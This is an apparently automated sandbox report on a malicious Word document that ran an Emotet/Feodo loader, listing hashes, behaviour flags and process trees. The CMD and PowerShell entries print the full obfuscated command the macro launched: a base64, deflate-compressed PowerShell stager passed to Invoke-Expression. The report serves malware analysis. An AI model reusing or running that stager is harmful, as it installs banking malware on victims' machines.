General Info

File name

Nuevo-documento.doc

Full analysis
https://app.any.run/tasks/450f4787-85b0-482c-b4fc-8c0168a42cdc
Verdict
Malicious activity
Analysis date
11/8/2018, 16:43:26
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

generated-doc

trojan

loader

emotet

banker

feodo

Indicators:

MIME:
application/msword
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Stella-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:48:00 2018, Last Saved Time/Date: Wed Nov 7 16:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5

cf7ce87832e2b8a5b9c26c1a2fd1c2d5

SHA1

dd91d4aad004787a7df6fc0aa1344b9dfcc44236

SHA256

b303dbd7790be21de9b61e812537ef369ce7327fd536f46dbe3105f7c0273c80

SSDEEP

768:V7FLVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OkDUsDPjEed72g:VZLocn1kp59gxBK85fBt+a9ZdS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
180 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • lpiograd.exe (PID: 3396)
  • 509.exe (PID: 3980)
  • lpiograd.exe (PID: 2036)
  • 509.exe (PID: 2552)
Downloads executable files from the Internet
  • powershell.exe (PID: 1580)
FEODO was detected
  • lpiograd.exe (PID: 2036)
Connects to CnC server
  • lpiograd.exe (PID: 2036)
Changes the autorun value in the registry
  • lpiograd.exe (PID: 2036)
Emotet process was detected
  • lpiograd.exe (PID: 3396)
EMOTET was detected
  • lpiograd.exe (PID: 2036)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 3040)
Starts CMD.EXE for commands execution
  • WINWORD.EXE (PID: 3040)
Reads internet explorer settings
  • CLVIEW.EXE (PID: 1996)
  • CLVIEW.EXE (PID: 1880)
  • CLVIEW.EXE (PID: 3516)
Starts Microsoft Office Application
  • WINWORD.EXE (PID: 3040)
Application launched itself
  • lpiograd.exe (PID: 3396)
Reads Internet Cache Settings
  • CLVIEW.EXE (PID: 3516)
Starts itself from another location
  • 509.exe (PID: 3980)
Executable content was dropped or overwritten
  • 509.exe (PID: 3980)
  • powershell.exe (PID: 1580)
Connects to unusual port
  • lpiograd.exe (PID: 2036)
Connects to SMTP port
  • lpiograd.exe (PID: 2036)
Executes PowerShell scripts
  • CMD.exe (PID: 3896)
Creates files in the user directory
  • powershell.exe (PID: 1580)
Reads Microsoft Office registry keys
  • CLVIEW.EXE (PID: 1880)
  • CLVIEW.EXE (PID: 1996)
  • CLVIEW.EXE (PID: 3516)
  • WINWORD.EXE (PID: 3040)
Creates files in the user directory
  • WINWORD.EXE (PID: 3040)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.doc
|   Microsoft Word document (54.2%)
.doc
|   Microsoft Word document (old ver.) (32.2%)
EXIF
FlashPix
Title:
null
Subject:
null
Author:
Stella-PC
Keywords:
null
Comments:
null
Template:
Normal.dotm
LastModifiedBy:
null
RevisionNumber:
1
Software:
Microsoft Office Word
TotalEditTime:
null
CreateDate:
2018:11:07 16:48:00
ModifyDate:
2018:11:07 16:48:00
Pages:
1
Words:
2
Characters:
13
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
Lines:
1
Paragraphs:
1
CharCountWithSpaces:
14
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
null
HeadingPairs
null
null
CompObjUserTypeLen:
32
CompObjUserType:
Microsoft Word 97-2003 Document

Screenshots

Processes

Total processes
42
Monitored processes
10
Malicious processes
8
Suspicious processes
0

Behavior graph

+
start download and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 509.exe no specs 509.exe #EMOTET lpiograd.exe no specs #FEODO lpiograd.exe clview.exe no specs clview.exe no specs clview.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3040
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Nuevo-documento.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\program files\common files\microsoft shared\office14\1033\alrtintl.dll
c:\program files\microsoft office\office14\clview.exe

PID
3896
CMD
CMD cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^| %{ $_.rEadTOENd( ) })^|inVOKe-EXpreSSioN&&POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))"
Path
C:\Windows\system32\CMD.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1580
CMD
POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
CMD.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\509.exe
c:\windows\system32\netutils.dll

PID
2552
CMD
"C:\Users\admin\AppData\Local\Temp\509.exe"
Path
C:\Users\admin\AppData\Local\Temp\509.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Norwegian with Sami Keyboard Layout
Version
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Modules
Image
c:\users\admin\appdata\local\temp\509.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mscms.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\profapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3980
CMD
"C:\Users\admin\AppData\Local\Temp\509.exe"
Path
C:\Users\admin\AppData\Local\Temp\509.exe
Indicators
Parent process
509.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Norwegian with Sami Keyboard Layout
Version
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Modules
Image
c:\users\admin\appdata\local\temp\509.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\mscms.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\profapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\microsoft\wi
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\mssprxy.dll

PID
3396
CMD
"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"
Path
C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
Indicators
Parent process
509.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Norwegian with Sami Keyboard Layout
Version
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Modules
Image
c:\users\admin\appdata\local\microsoft\windows\lpiograd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mscms.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\profapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2036
CMD
"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"
Path
C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
Indicators
Parent process
lpiograd.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Norwegian with Sami Keyboard Layout
Version
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Modules
Image
c:\users\admin\appdata\local\microsoft\windows\lpiograd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mscms.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\profapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll

PID
3516
CMD
"C:\Program Files\Microsoft Office\Office14\CLVIEW.EXE" "WINWORD" "Microsoft Word"
Path
C:\Program Files\Microsoft Office\Office14\CLVIEW.EXE
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Office Help Viewer
Version
14.0.6015.1000
Modules
Image
c:\program files\microsoft office\office14\clview.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\program files\microsoft office\office14\msocf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\imm32.dll
